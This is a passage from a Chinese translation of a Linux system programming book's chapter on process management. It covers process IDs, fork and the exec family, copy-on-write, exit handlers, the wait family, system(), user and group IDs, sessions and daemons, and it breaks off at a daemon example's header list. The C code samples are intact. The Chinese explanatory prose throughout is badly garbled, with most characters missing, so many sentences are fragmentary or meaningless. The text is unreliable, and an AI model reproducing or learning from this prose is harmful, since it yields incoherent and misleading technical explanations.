C 的实。我们 I/O 更效更
的 I/O 调以及性能的操作。
的我们将进程的理方的。进!
– 132 –
5
进程理
第 5 章
进程管理
提的进程 Unix 文件的。
的时进程、、
的。
将进程的。自的 Unix
的东。进程理 Unix 设
们的。进程的上 Unix 的处理
方将进程的新进离。然
的以更的对操作进
理。操作单的提调进程的
方式 Unix 提调 fork exec。我们
们进程的。
5.1 进程 ID
进程的示的即进程 ID pid。
时 pid 的。 t0 时进程的 pid
770(的进程的 pid 770 的 t1 时
进程的 pid 能 770。上设内
的 pid 设的相的。
空进程 (idle process)进程时内的进
程的 pid 0。内的进程 init 进程的 pid
1。 Linux init 进程 init 程。我们将init
示内的进程相的程。
式内的程(内的 init
内的 init 程的内的
子。 Linux 内以以进
1. /sbin/init init 能存的方。
2. /etc/init能的方。
3. /bin/init init 能存的。
– 133 –
5
进程理
4. /bin/sh Bourne shell 的的内 init 时内
。
以上的 init 。的
内出 panic。
内出 init 的程。的 init
进程。
5.1.1 分配进程 ID
内将进程 ID 的 32768。的 Unix
16 示进程的 ID。理以设
/proc/sys/kernel/pid max 的的性。
内进程 ID 以的性方式进的。 17 进程
id 的的 18 给新进程的即新进程时上
pid 17 的进程。内的 pid /proc/sys/ker-
nel/pid max内以的。 Linux 相
的段时间内同进程 ID 的性 Linux pid 的方式
内的 pid 的性。
5.1.2 进程体系
新进程的进程进程新进程子进程。进程
进程的( init 进程子进程进程。
存进程的进程 ID (ppid。
进程。属实
的。对内。 /etc/passwd /etc/group
文件映射们读的式。 Unix 对
root 、 wheel (内读的
更喜示们。子进程进程的。
进程进程的单的自进程
间的上的、的。子进程属进
程的进程。 shell (的
ls | less的同进程的。进程
相的进程间同的子进
– 134 –
5
进程理
程。的进程更。
5.1.3 pid t
程时进程 ID pid t 示的 <sys/types.h>
。的 C 相的何的 C
。 Linux C 的 int 。
5.1.4 获得进程 ID 和父进程的 ID
getpid() 调进程的 ID
#include <sys/types.h>
#include <unistd.h>
pid_t getpid (void);
getppid() 调进程的进程的 ID
#include <sys/types.h>
#include <unistd.h>
pid_t getppid (void);
调时的
printf (”My pid=%d\n”, getpid());
printf (”Parent’s pid=%d\n”, getppid());
上我们何 pid t 的
单我们。 Linux 上我们设 pid t int
的的的能性的。的
C typedefs 的 pid t 的方式存
的。上我们 pid to int()
我们。对 printf() pid t 处理
的。
– 135 –
5
进程理
5.2 运行新进程
Unix 内存程映的操作新进程的操作
离的。 Unix 调(实上调以将进
文件的程映内存原进程的空间。
程新的程相的调 exec 调。
同时同的调新的进程上
进程。新的进程新的程。新进程的
(fork)能的调 fork() 。操作
fork即新的进程; 然即将新的进程
新的程。我们 exec 调然 fork()。
5.2.1 exec 系列系统调用
实单的 exec 调们单调的 exec
。我们单的 execl()
#include <unistd.h>
int execl (const char *path, const char *arg,
...);
对 execl() 的调将 path 的映内存进程的映
。 arg 的。的 execl()
(variadic的的。
以 NULL 的。
的 /bin/vi 的程
int ret;
ret = execl (”/bin/vi”, ”vi”, NULL);
if (ret == -1)
perror (”execl”);
我们 Unix 的”vi” 作。 fork/exec
进程时 shell 的即”vi”新进程的
argv[0]。程以 argv[0]进映文件的
– 136 –
5
进程理
。工同的实上
同程的。以程的的
。
子 /home/kidd/hooks.txt以
int ret;
ret = execl (”/bin/vi”, ”vi”,
”/home/kidd/hooks.txt”, NULL);
if (ret == -1)
perror (”execl”);
execl() 。的调以新的程的作
的存进程的空间的。
时 execl() -1设 errno 的示出的。我们
的 errno 的能。
execl() 的调空间进程的映进程的
属性
• 何的。
• 的何原的处理方式处理存
空间。
• 何内存的(。
• 程的属性原。
• 进程的。
• 进程内存相的何映射的文件。
• C 的性 ( atexit()) 存空间的
。
然进程的属性 pid、进程的 pid、、
属的。
的文件 exec 。新进程原进程
的文件的新的进程以原进程。然
理的处理方。以实操作 exec 调的文
件然以 fcntl( ) 内自。
– 137 –
5
进程理
5.2.1.1 其他 exec 系列系统调用
execl() 调
#include <unistd.h>
int execlp (const char *file, const char *arg,
...);
int execle (const char *path, const char *arg,
..., char * const envp[]);
int execv (const char *path, char *const argv[]);
int execvp (const char *file, char *const argv[]);
int execve (const char *filename, char *const
argv[], char *const envp[]);
单的。 l v 示以方式或
() 方式提的。 p 的 PATH 文
件。出的 p 的 exec 以单的提文件。
e 示提给新进程以新的。的上理
出 exec 同时以新的
。能 p 的 exec shell 的 shell 的进
程 shell 。
作作
的 exec 上。作以时
的。以 NULL 。
我们的子的段 execvp() vi
const char *args[] = { ”vi”,
”/home/kidd/hooks.txt”, NULL };
int ret;
ret = execvp (”vi”, args);
if (ret == -1)
perror (”execvp”);
设 /bin 的工作方式上子相。
– 138 –
5
进程理
Linux 们真的调的 C
的。处理的调实的
存空间以 execve() 的。的原时
的。
5.2.1.2 错误返回值
调时 exec 调时 -1 errno 设
E2BIG
(arg或(envp的。
EACCESS
path 的的 path 的文件
文件文件的 path 或文件的文件
以 (noexec) 的方式。
EFAULT
给的效的。
EIO
I/O (的。
EISDIR
path 的或。
ELOOP
path 时的。
EMFILE
调进程的文件。
ENFILE
文件时(system-wide的。
ENOENT
或文件存或的存。
ENOEXEC 文件效的进文件或上
的式。
ENOMEM 内的内存新的程。
ENOTDIR path 的。
EPERM
path 或文件的文件 nosuid root
path 或文件设 suid 或 sgid 。
ETXTBSY 文件进程以写方式。
5.2.2 fork() 系统调用
进程映的进程以 fork() 调
#include <sys/types.h>
#include <unistd.h>
– 139 –
5
进程理
pid_t fork (void);
调 fork() 新的进程调 fork() 的进程
。进程调 fork() 的
。
新的进程原进程的子进程原进程自然进程。子进程
的 fork() 调 0。进程 fork() 子进程的 pid。
的方进程子进程间方相
• 然子进程的 pid 新的进程同的。
• 子进程的 ppid 设进程的 pid。
• 子进程的(Resource statistics零。
• 何的子进程(。
• 何文件子进程。
调出时子进程 fork() -1。同时设相的 errno 的
。 errno 的们能的
EAGAIN
内 时 新 的 pid或
RLIMIT NPROC 设的。
ENOMEM 的内内存满的操作。
pid_t pid;
pid = fork ();
if (pid > 0)
printf (”I am the parent of pid=%d!\n”, pid);
else if (!pid)
printf (”I am the baby!\n”);
else if (pid == -1)
perror (”fork”);
的 fork() 新的进程然进映
shell 新进程或进程进程。
(fork新的进程子进程新的进文件
的映。的方式的单的。的
子新的进程 /bin/windlass:
– 140 –
5
进程理
pid_t pid;
pid = fork ();
if (pid == -1)
perror (”fork”);
/* the child ... */
if (!pid) {
const char *args[] = { ”windlass”, NULL };
int ret;
ret = execv (”/bin/windlass”, args);
if (ret == -1) {
perror (”execv”);
exit (EXIT_FAILURE);
}
}
子进程进程何的。 execv()
子进程 /bin/windlass。
5.2.2.1 写时复制
的 Unix 进程原。调 fork 时内
的内进程的页然进程的空间的
内页的子进程的空间。内页的方式
时的。
的 Unix 更的。的 Unix Linux
写时的方对进程空间进。
写时性方式时的。的
提单进程读们自的的
的。进程存的以。
进程自的” ”存的进程
。的。进程自的
的提给进程。的
对进程的。进程以的同时的进
程然的。以的写时进
– 141 –
5
进程理
。
写时的处进程进
。性的处们的操作的时
。
内存的, 写时(Copy-on-write以页进
的。以进程的空间空
间。 fork() 调进程子进程相们自的空
间实上们进程的原页页以的进程
或子进程。
写时内的实单。内页相的以
读写时。进程页页。内
处理页处理的方式对页进。时页的
COW 属性示。
的内存理单(MMU提件的写
时以实的。
调 fork() 时写时的。的 fork
exec进程空间的内子进程的空间
时间子进程新的进文件的映
的空间出。写时以对进。
5.2.2.2 vfork
实写时 Unix 的设们 fork
exec 的空间的。 BSD 的们 3.0 的 BSD
vfork() 调。
#include <sys/types.h>
#include <unistd.h>
pid_t vfork (void);
子进程对 exec 的调或调 exit()
出(将的进对 vfork() 的调的 fork()
的。 vfork() 进程子进程或新的
文件的映。方式 vfork() 空间的页。程
– 142 –
5
进程理
进程子进程相同的空间页 (写时)。实上
vfork() 件内的内。子进程能
空间的何内存。
vfork() Linux 实。的即
写 时 vfork() fork() 进 页 的
。∗然写时的出对 fork() 。实上 2.2.0 内
vfork() 的 fork()。对 vfork() 的小 fork()以
vfork() 的实方式的。的 vfork() 的实
的 exec 调时的子进程或
出进程将。
5.3 终止进程
POSIX C89 进程的
#include <stdlib.h>
void exit (int status);
对 exit() 的调的进程的步然内
进程。实上。
理 exit() 何的。
status 示进程出的。进程 shell 的
以。 status & 0377 给进程。我们
。
EXIT SUCCESS EXIT FAILURE 示
的。 Linux 0 示零 1 或 -1示。
进程的出时单的写上
exit (EXIT_SUCCESS);
进程 C 以进程的工作
1. 以的调 atexit() 或 on exit() 的(我们
。
∗Linux Kernel Mailing List(lkml出页的写时的
2.6 内。进内 vfork() 何处的。
– 143 –
5
进程理
2. 空的 I/O 。
3. tmpfile() 的时文件。
步空间的 exit() 以调 exit(
) 内处理进程的工作
#include <unistd.h>
void _exit (int status);
进程出时内理进程的、的何。
(的内存、的文件 System V 的
。理内进程进程子进程的。
程以调 exit()的的程
出程的理工作空 stdout 。 vfork()
的进程时 exit() exit()。
相段时间 ISO C99 Exit()
的能 exit() 的
#include <stdlib.h>
void _Exit (int status);
5.3.1 其他终止进程的方式
进程的方式的调
程处的方式。 C main() 时。然
方式然进调单的的
exit()。 main() 时给出或调 exit()
的程。 shell 的。
时的 exit(0)或 main() 0。
进程对的处理进程进程
。的 SIGTERM SIGKILL(。
进程内性的。内
段或内存的进程。
– 144 –
5
进程理
5.3.2 atexit()
POSIX 1003.1-2001 Linux 实。 atexit()
进程时调的
#include <stdlib.h>
int atexit (void (*function)(void));
对 atexit() 的调的进程(进程
以调 exit() 或 main() 的方式自时调的。进程
调 exec的(存新进程的
空间。进程的的调。
的的。的原
void my_function (void);
调的的相的。存以
进出的方式调(LIFO。的能调 exit()的
调。提进程调 exit()。
的的调。
POSIX atexit() ATEXIT MAX
32。的以 sysconf( ) SC ATEXIT MAX
long atexit_max;
atexit_max = sysconf (_SC_ATEXIT_MAX);
printf (”atexit_max=%ld\n”, atexit_max);
时 atexit() 0。时 -1。
单的子
#include <stdio.h>
#include <stdlib.h>
void out (void)
{
printf (”atexit( ) succeeded!\n”);
}
– 145 –
5
进程理
int main (void)
{
if (atexit (out))
fprintf(stderr, ”atexit( ) failed!\n”);
return 0;
}
5.3.3 on exit( )
SunOS 4 自的 atexit() 的 on exit() Linux 的 glibc 提
对的
#include <stdlib.h>
int on_exit (void (*function)(int , void *), void
*arg);
的工作方式 atexit() 的原同
void my_function (int status, void *arg);
status 给 exit() 的或 main() 的。 arg 给 on exit
() 的。小的调时 arg 的内存
效的。
新的 Solaris 的 atexit()。
5.3.4 SIGCHLD
进程子进程时内进程 SIGCHILD 。
进程何的作。进程 signal() 或
sigaction() 调的处理。调处理的
。
SIGCHILD 能何时何时给进
程。子进程的进程异步的。进程能
更的子进程的或式的子进程的。相
的调。
– 146 –
5
进程理
5.4 等待终止的子进程
进程以的的进程子进程的
更子进程的。
程子进程给进程何以
子进程的东。以 Unix 的设们出的子进
程进程内子进程设的。处
的进程(zombie进程。进程小的存
的内。的进程进程自的(
进程上。进程子进程的子进程
。
Linux 内提的子进程的。单的
wait() POSIX
#include <sys/types.h>
#include <sys/wait.h>
pid_t wait (int *status);
wait() 子进程的 pid或 -1 示出。子进程
调子进程。子进程
的。相子进程的 wait() 调( SIGCHILD
以的方式。
时 errno 能的
ECHILD 调进程何子进程。
EINTR
子进程时 wait() 提。
status NULL子进程的。
POSIX 实时以 status 的 bit 示。 POSIX
提
#include <sys/wait.h>
int WIFEXITED (status);
int WIFSIGNALED (status);
int WIFSTOPPED (status);
– 147 –
5
进程理
int WIFCONTINUED (status);
int WEXITSTATUS (status);
int WTERMSIG (status);
int WSTOPSIG (status);
int WCOREDUMP (status);
子进程的能真(零。
进程进程调 exit( ) WIFEXITED
真。 WEXITSTATUS 给 exit( ) 的。
( 对 的 进 程 的 WIFSIG-
NALED 真。 WTERMSIG 进程的的
。进程时存 (dumped core) WCOREDUMP
true。 WCOREDUMP POSIX Unix
Linux 。
子进程或 WIFSTOPPED WIFCONTINUED
真。 ptrace() 调的。实调时
。 waitpid()(的们以实
作业。 wait() 子进程的。 WIFSTOPPED
真 WSTOPSIG 进程的的。然 POSIX
WIFCONTINUED新的 waitpid()。 2.6.10 内
Linux wait() 提。
我们 wait() 子进程的
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
int main (void)
{
int status;
pid_t pid;
if (!fork ())
return 1;
– 148 –
5
进程理
pid = wait (&status);
if (pid == -1)
perror (”wait”);
printf (”pid=%d\n”, pid);
if (WIFEXITED (status))
printf (”Normal termination with exit
status=%d\n”, WEXITSTATUS (status));
if (WIFSIGNALED (status))
printf (”Killed by signal=%d%s\n”, WTERMSIG
(status), WCOREDUMP (status) ? ” (dumped
core)” : ””);
if (WIFSTOPPED (status))
printf (”Stopped by signal=%d\n”, WSTOPSIG
(status));
if (WIFCONTINUED (status))
printf (”Continued\n”);
return 0;
}
程子进程出。进程调
wait() 子进程的。进程出子进程的 pid 以及。
子子进程的 main() 以以的出
$ ./wait
pid=8529
Normal termination with exit status=1
子进程的 main() 调 abort()( <stdlib.h>
子进程自 SIGABRT 我们
的将的出
$ ./wait
pid=8678
Killed by signal=6
– 149 –
5
进程理
5.4.1 等待特定进程
子进程的的。进程能子进程
子进程的进程的子进程。
方式调 wait()的进程。
的设子进程的
进程存 wait() 的以备将。
进程的 pid以 waitpid() 调
#include <sys/types.h>
#include <sys/wait.h>
pid_t waitpid (pid_t pid, int *status, int
options);
wait() waitpid() 更的调。的以
调。
pid 的或进程的 pid。的
< -1 的子进程们的 ID pid 的绝对。 -500
示进程 500 的子进程。
-1
子进程 wait() 效。
0
调进程处同进程的进程。
>0
进程 pid 的子进程。 500 示 pid 500
的子进程。
status 的作 wait() 的的的
以的。
options 零或进或的
WNOHANG
的子进程或或处
的 waitpid() 。
WUNTRACED
设 即 调 进 程 子 进 程 WIF-
STOPPED 设。以实更的
作业 shell。
– 150 –
5
进程理
WCONTINUED 设即调进程子进程 WIFCON-
TINUED 设。 WUNTRACED 对
shell 的实的。
调时 waitpid() 进程的 pid。设
WNOHANG 的(进程的
0。时 -1 errno 的的
ECHILD pid 的进程存或调的子进程。
EINTR
设 WNOHANG程。
EINVAL options 。
作子设的程 pid 1742 的子进程的
子进程, 进程。写出的
int status;
pid_t pid;
pid = waitpid (1742, &status, WNOHANG);
if (pid == -1)
perror (”waitpid”);
else {
printf (”pid=%d\n”, pid);
if (WIFEXITED (status))
printf (”Normal termination with exit
status=%d\n”, WEXITSTATUS (status));
if (WIFSIGNALED (status))
printf (”Killed by signal=%d%s\n”, WTERMSIG
(status), WCOREDUMP (status) ? ” (dumped
core)” : ””);
}
作子 wait() 的
wait (&status);
waitpid() 的
– 151 –
5
进程理
waitpid (-1, &status, 0);
5.4.2 其他等待子进程的方法
作程们更子进程的方式。 XSI 扩展
POSIX Linux 提 waitid():
#include <sys/wait.h>
int waitid (idtype_t idtype, id_t id, siginfo_t
*infop, int options);
wait() waitpid() , waitid() 作子进程的子进程
的(、或。更的以
性的。
waitpid() waitid() 程的子进程。
工作 waitid() 。 idtype id
的子进程 waitpid() 的 pid 的作。 idtype 的
的
P PID
pid id 的子进程。
P GID 进程 ID id 子进程。
P ALL 子进程 id 。
id 的 id t 的 ID 。将
能 idtype 的以。新的 idtype 以
进。 id t 的以存何的 pid t 。 Linux
上以 pid t pid t 的给或
性的。程上的。
options 以或进进” 或” 的
WEXITED
调进程的子进程( id idtyp 。
WSTOPPED
调进程的子进程。
WCONTINUED 调进程的子进程。
WNOHANG
调进程子进程(或
。
– 152 –
5
进程理
WNOWAIT
调进程满件的子进程的。调进程
能将。
时 waitid() infop效的 siginfo t
。 siginfo t 的实相的。∗
waitpid() 调效的。的调的
si pid
子进程的 pid
si uid
子进程的 uid
si code
子 进 程 的 、 、 或
设 CLD EXITED、 CLD KILLED、 CLD STOPPED 或
CLD CONTINUED 的。
si signo 设 SIGCHLD。
si status si code CLD EXITED子进程的出。
的的。
时 waitid() 0。时 -1。 errno 设
ECHLD id idtype 的进程存。
EINTR
子进程的 options 设 WNO-
HANG。
EINVAL options 或 id idtyp 的。
waitid() 提 wait() waitpid() 更的。以 siginfo t
的的。更
单的以更的以更更的
Linux 的上。
5.4.3 BSD 中的 wait3() 和 wait4()
waitpid() AT&T 的 System V Release 4 的同时 BSD 自的方
提子进程的
#include <sys/types.h>
∗实上 siginfo t Linux 上的。的 /usr/include/bits/sig-
info.h。我们的更。
– 153 –
5
进程理
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/wait.h>
pid_t wait3 (int *status, int options, struct
rusage *rusage);
pid_t wait4 (pid_t pid, int *status, int options,
struct rusage *rusage);
3 4 实上。
rusage 的工作方式 waitpid() 对
wait3() 的调
pid = wait3 (status, options, NULL);
的 waitpid() 调
pid = waitpid (-1, status, options);
对 wait4() 的调
pid = wait4 (pid, status, options, NULL);
的 waitpid() 调
pid = waitpid (pid, status, options);
wait3() 何子进程 wait4() pid 的子
进程。 options 的作 waitpid() 的。
提调的同 rsuage 。 rsuage
空的 rsuage 上子进程相的。
提子进程的
#include <sys/resource.h>
struct rusage {
struct timeval ru_utime; /* user time consumed
*/
struct timeval ru_stime; /* system time
consumed */
– 154 –
5
进程理
long ru_maxrss;
/* maximum resident set size
*/
long ru_ixrss;
/* shared memory size */
long ru_idrss;
/* unshared data size */
long ru_isrss;
/* unshared stack size */
long ru_minflt;
/* page reclaims */
long ru_majflt;
/* page faults */
long ru_nswap;
/* swap operations */
long ru_inblock;
/* block input operations */
long ru_oublock;
/* block output operations */
long ru_msgsnd;
/* messages sent */
long ru_msgrcv;
/* messages received */
long ru_nsignals; /* signals received */
long ru_nvcsw;
/* voluntary context switches
*/
long ru_nivcsw;
/* involuntary context
switches */
};
我们。
调时 0。时 -1。 errno 设 waitpid()
的。
wait3() wait4() POSIX 的∗以们
真的子进程的。们 POSIX 的
的 UNIX 们。
5.4.4 创建并等待一个新进程
ANSI POSIX 新进程的
以同步的进程。进程新进程然
的的
∗ wait3() Single UNIX Specification
– 155 –
5
进程理
#define _XOPEN_SOURCE
/* if we want
WEXITSTATUS, etc. */
#include <stdlib.h>
int system (const char *command);
system() 以进程同步” 给
”。 system() 单的工程或 shell 的
工程或的。
对 system() 的调 command 的程的
程以以相的。”/bin/sh –c” 作 command
。将给 shell。
时的同 wait() 的。
的 WEXITSTATUS 。对 /bin/sh 自的调
WEXITSTATUS 的调 exit(127) 的
的。能调的 127 shell 自
的 127。 system() 调时 -1。
command NULL /bin/sh 的 system() 零的
0。
的 程 SIGCHILD 的 SIGINT
SIGQUIT 。实对 SIGINT SIGQUIT 的实
方式 system() 调的时。调
system()子进程的出。
do {
int ret;
ret = system (”pidof rudderd”);
if (WIFSIGNALED (ret) && (WTERMSIG (ret) ==
SIGINT || WTERMSIG (ret) == SIGQUIT))
break; /* or otherwise handle */
} while (1);
fork()、 exec 调 waitpid() 实 system() 的
。自的。性
单的实
– 156 –
5
进程理
/*
* my_system - synchronously spawns and waits for
the command
* ”/bin/sh -c <cmd>”.
*
* Returns -1 on error of any sort, or the exit
code from the
* launched process. Does not block or ignore any
signals.
*/
int my_system (const char *cmd)
{
int status;
pid_t pid;
pid = fork ( );
if (pid == -1)
return -1;
else if (pid == 0) {
const char *argv[4];
argv[0] = ”sh”;
argv[1] = ”-c”;
argv[2] = cmd;
argv[3] = NULL;
execv (”/bin/sh”, argv);
exit (-1);
}
if (waitpid (pid, &status, 0) == -1)
return -1;
else if (WIFEXITED (status))
return WEXITSTATUS (status);
return -1;
}
– 157 –
5
进程理
子式的 system()或何。
程的能能。 SIGINT
的以的时的。
的实以将的空时同的
。能 fork failed shell failed。
5.4.5 僵死进程
提的进程的进程
进程进程。进程
进程的。的
进程子进程的时提相的。进程
的内的进程存。
然何 Unix 的或或的进程。进
程进程 (ghosts)进程相的进程。的进程
子进程子进程(的周
即的子进程的。的子进程
进程存。们的进程的程
.
然进程子进程或进程
的子进程何时进程内
的子进程们的进程新设 init 进程(pid 1 的
进程。存进程的进程。 init 进程周性的
子进程时间存的进程进程。进
程子进程或出子进程 init 进程
子进程的进程们的出。的处
理方式周的进程的子进
程。
5.5 用户和组
的进程相的。
ID ID C 的 uid t gid t 示。示读
间的映射( root 的 uid 0空间的 /etc/passwd
– 158 –
5
进程理
/etc/group 文件的。内处理示的式。
Linux 进程的 ID ID 进程以操
作。进程以的。的进程以 root 的。然
的方式小的原进程的以小
的。的进程以 root 的
root 能的 root
。进程 root 操作时
操作自的 ID 或 ID。
我们何实我们 ID ID 的
性。
5.5.1 实际用户 (组)ID、有效用户 (组)ID 和保存设置的用户 (组)ID
的集 ID 上 ID 的的。
实上进程相的 ID 们
实 ID、效 ID、存设的 ID 文件
ID。实 ID 进程的的 uid。
的 uid 设进程的实 ID exec
调。进程将的 shell 的实
ID 设的 ID进程的实 ID
。超(root能实 ID 的
能的。
效 ID 进程的 ID。。
时 ID 实 ID。进程时子进程进程的效
ID。更进步的 exec 调效 ID。 exec 调
程实 ID 效 ID 的出 setuid (suid) 程
进程以自的效 ID。的效 ID 设
程文件的 ID。 /usr/bin/passwd setuid 文件的
root 。进程
进程的效 ID root 的 ID。
能效 ID 设实 ID 或存
设的 ID。超以效 ID 设何。
存设的 ID 进程原的效 ID。进程时子进程
– 159 –
5
进程理
进程存设的 ID。对 exec 调内存设的
ID 设效 ID exex 调程存效
ID 的。能存设的 ID 的超以设
实 ID 的。
的 ID 效 ID 的作进程
程的 ID。实 ID 存设的 ID 理或
的 ID 的作 root 进程 ID 间相。实
ID 真程的效 id。存设的 ID suid 程
的效 id。
5.5.2 改变实际用户 (组)ID 和保存设置的用户 (组)ID
ID ID 调设的
#include <sys/types.h>
#include <unistd.h>
int setuid (uid_t uid);
int setgid (gid_t gid);
setuid() 设进程的效 ID。进程的效 ID
0(root实 ID 存设的 ID 的同时设。 root
以 uid 提何将 ID 的设 uid。 root
将实 ID 存设的 ID 设 uid。 root
能将效 ID 设上的。
调时 setuid() 0。时 -1 errno 设的
EAGAIN uid 的实 ID 的同实 ID 的的 uid
超 NPROC 的(以的进程
。
EPERM
root uid 效 ID 存设的 ID。
的对然的将 setuid() setgid() uid
gid。
– 160 –
5
进程理
5.5.3 改变有效用户和组 ID
Linux 提 POSIX 的进程的效 id
ID 的
#include <sys/types.h>
#include <unistd.h>
int seteuid (uid_t euid);
int setegid (gid_t egid);
setuid() 的调将效 ID 的设 euid。 root 以 euid 提
何。 root 能将效 ID 设效 ID 或存设的
ID。时 setuid() 0时 -1 errno 设 EPERM。
示进程的 root euid 的实 ID
存设的 ID。
对 root seteuid() setuid() 的。以
seteuid() 的。的进程以 root setuid()
更。
的对然的将 seteuid() setegid() euid
egid。
5.5.4 BSD 改变用户 ID 和组 ID 的方式
BSD ID ID 上自的。出性 Linux
提
#include <sys/types.h>
#include <unistd.h>
int setreuid (uid_t ruid, uid_t euid);
int setregid (gid_t rgid, gid_t egid);
调 setreuid() 将实 ID 效 ID 设 ruid
euid。将的何设 -1 示相的 ID。
root 将效 ID 设实 ID 或存设的 ID
实 ID 设效 ID。实 ID 或效
ID 设的实 ID 的或存设的 ID 设
– 161 –
5
进程理
新的效 ID Linux 或 Unix 自
的。 POSIX 的。
时 setreuid() 0时 -1 errno 设 EPERM。
示进程的 root euid 的即实 ID
存设的 ID或 ruid 效 ID。
的对然的将 setreuid() setregid()
ruid rgid euid egid。
5.5.5 HP-UX 中改变用户 ID 和组 ID 的方式
能式 HP-UX(Hewlett-Packard s Unix
) 自设 ID ID 的方式。 Linux 同提
#define _GNU_SOURCE
#include <unistd.h>
int setresuid (uid_t ruid, uid_t euid, uid_t
suid);
int setresgid (gid_t rgid, gid_t egid, gid_t
sgid);
调 setresuid() 将实 ID、效 ID 存设的 ID
设 ruid、 euid suid。将的何设 -1 示
相的 ID。
root 以何 ID 设何。 root 以
ID 设的实 ID、效 ID 存设的 ID。时
setresuid()(原文 0时 0 errno 设
EAGAIN uid 的实 ID 的同实 ID 的 uid
超 NPROC 的(以的进程
。
EPERM
root 设的新的实 ID、效 ID 或存设
的 ID的实 ID、效 ID 或存设的
ID。
的对然的将 setresuid() setresgid ()
ruid rgid euid egid suid sgid。
– 162 –
5
进程理
5.5.6 操作用户 ID 组 ID 的首选方法
root seteuid() 设效 ID。 root 的进
程 ID setuid()时效
ID seteuid()。单的们的 POSIX
的的时存设的 ID。
提的能 BSD HP-UX 作出 setuid() seteuid()
的。
5.5.7 对保存设置的用户 ID 的支持
存设的 ID IEEE Std 1003.1-2001(POSIX 2001) 出的 Linux
1.1.38 内时提相的。 Linux 写的程以
存设的 id。的 Unix 写的程存设的
id 或 id POSIX SAVED IDS 。
对设的 ID ID 的上的然
的。设的 ID ID 的相即。
5.5.8 获取用户 ID 和组 ID
的调实 ID ID
#include <unistd.h>
#include <sys/types.h>
uid_t getuid (void);
gid_t getgid (void);
们能。相的调效 ID ID
#include <unistd.h>
#include <sys/types.h>
uid_t geteuid (void);
gid_t getegid (void);
调同能。
– 163 –
5
进程理
5.6 会话和进程组
进程属进程。进程或相间的进程
的的的进作业。进程的以
给进程的进程以同进程的进程、
或。
进程进程 ID(pgid的进程。进
程 ID 进程的 pid。进程进程存进
程存。即进程进程然存。
新的进程新的
。的 shell 进程。 shell 进程
(session leader)。进程的 pid 作的 ID。或
进程的集。的给
(controling terminal)。处理 I/O 的 tty 设备。
的能 shell 。们。
进程提进程的作业
的 shell 能。同时将。的
进程进程零或进程。出时
进程的进程 SIGQUIT 。出的时
进程的进程 SIGHUP 。(
Ctrl+C进程的进程 SIGINT 。以更
的理以及 shell 上的。
我们以上的设的的 shell
bash , pid 1700。的 shell 新进程的进程
进程。进程的 ID 1700 shell 的
进程。进程
进程的进程。
的存的
的进程 (进程)。进程
自的存的。
或进程进程进
程。进程的进程作业的。
– 164 –
5
进程理
$ cat ship-inventory.txt | grep booty | sort
以上 shell 进程的进程。以方
式 shell 以进程同时。
”&”以进程。 5-1 示、进程、进程
间的。
5-1 、进程、进程及间的
Linux 提设进程相的进程的。
们 shell 的进程的进程进程
进程上。
5.6.1 与会话相关的系统调用
时 shell 新的。的调
的以的
#include <unistd.h>
pid_t setsid (void);
调进程进程进程调 setsid() 新的。调
进程的进程新的进程
。调同时进程调进程进程
进程的进程。新 ID 进程 ID 设调进程的 pid。
– 165 –
5
进程理
setsid() 的新新的进程
调进程新的进程新进程的进程。对进程
何存的
。对 shell shell 的新的
。
调 setsid() 新的 ID。时 -1 errno 设
EPREM示调进程进程的进程。单的方
以何进程进程。新进程进程子
进程调 setsid()。
pid_t pid;
pid = fork ();
if (pid == -1) {
perror (”fork”);
return -1;
} else if (pid != 0)
exit (EXIT_SUCCESS);
if (setsid ( ) == -1) {
perror (”setsid”);
return -1;
}
然进程的 ID 以的
#define _XOPEN_SOURCE 500
#include <unistd.h>
pid_t getsid (pid_t pid);
对 getsid() 的调 pid 进程的 ID。 pid 0调
进程的 ID。时 -1。 errno 的能 ESRCH示 pid
何进程。 UNIX errno 设 EPREM示 pid
示的进程调进程属同。 Linux 处理
何进程的 ID。
getsid() 的
– 166 –
5
进程理
pid_t sid;
sid = getsid (0);
if (sid == -1)
perror (”getsid”); /* should not be possible */
else
printf (”My session id=%d\n”, sid);
5.6.2 与进程组相关的系统调用
setpgid() 将 pid 进程的进程 ID 设 pgid
#define _XOPEN_SOURCE 500
#include <unistd.h>
int setpgid (pid_t pid, pid_t pgid);
pid 0调的进程 ID。 pgid 0将 pid 程的进程
ID 设进程 ID。
时 0。件
• pid 的进程调或子进程子进程调
exec pid 进程调同。
• pid 进程能进程。
• pgid 存调同。
• pgid 。
时 -1 errno 设
EACCESS pid 进程调进程的子进程调进程调 exec 。
EINVAL
pgid 小 0。
EPERM
pid 进程进程或调同的
进程。能将进程同的进程
。
ESRCH
pid 进程或 0 或进程的子进程。
以进程的进程 ID
#define _XOPEN_SOURCE 500
#include <unistd.h>
– 167 –
5
进程理
pid_t getpgid (pid_t pid);
getpgid() pid 进程的进程 ID。 pid 0进程的进程
ID。出 -1 errno 的 ERSCH示 pid 的进程
。
getsid() getpgid
pid_t pgid;
pgid = getpgid (0);
if (pgid == -1)
perror (”getpgid”); /* should not be possible */
else
printf (”My process group id=%d\n”, pgid);
5.6.3 废弃的进程组函数
Linux BSD 的操作进程 ID 的。们
的调对性新的程
们。 setpgrp() 设进程 ID
#include <unistd.h>
int setpgrp (void);
的调
if (setpgrp ( ) == -1)
perror (”setpgrp”);
的调的
if (setpgid (0,0) == -1)
perror (”setpgid”);
进程 ID 设进程的进程 ID。时 0时
-1。 ERSCH setpgid() 的 errno 能 setpgrp()。
同的 getpgrp() 进程 ID
– 168 –
5
进程理
#include <unistd.h>
pid_t getpgrp (void);
的调
pid_t pgid = getpgrp ( );
的的
pid_t pgid = getpgid (0);
调进程的进程 ID。 getpgid() 能。
5.7 守护进程
进程何相。进程
时们以 root 或的( apache
postfix处理的。上进程的以 d (
crond sshd的的。
(Maxwell s demon理 James
Maxwell 1867 进的实。 Daemon 的
存间的能。 Judeo-Christian 的
daemon 同的 daemon 的。实上的 daemon
的林的自的 Unix 的进
程的。
对进程 init 进程的子进程
何相。
进程以以步进程
1. 调 fork()新的进程将的进程。
2. 进程的进程调 exit()。进程(进程的
进程进程。进程进程
进程。以步的提。
3. 调 setsid()进程新的进程新的
作进程。相(进程新的
同时。
– 169 –
5
进程理
4. chdir( ) 将工作。调 fork() 新进
程的工作能文件何方。进程
时同时理
进程工作的文件。
5. 的文件。何的文件对
的文件们处。
6. 0、 1 2 文件(、出
们 /dev/null。
的程以进程
#include <sys/types.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <linux/fs.h>
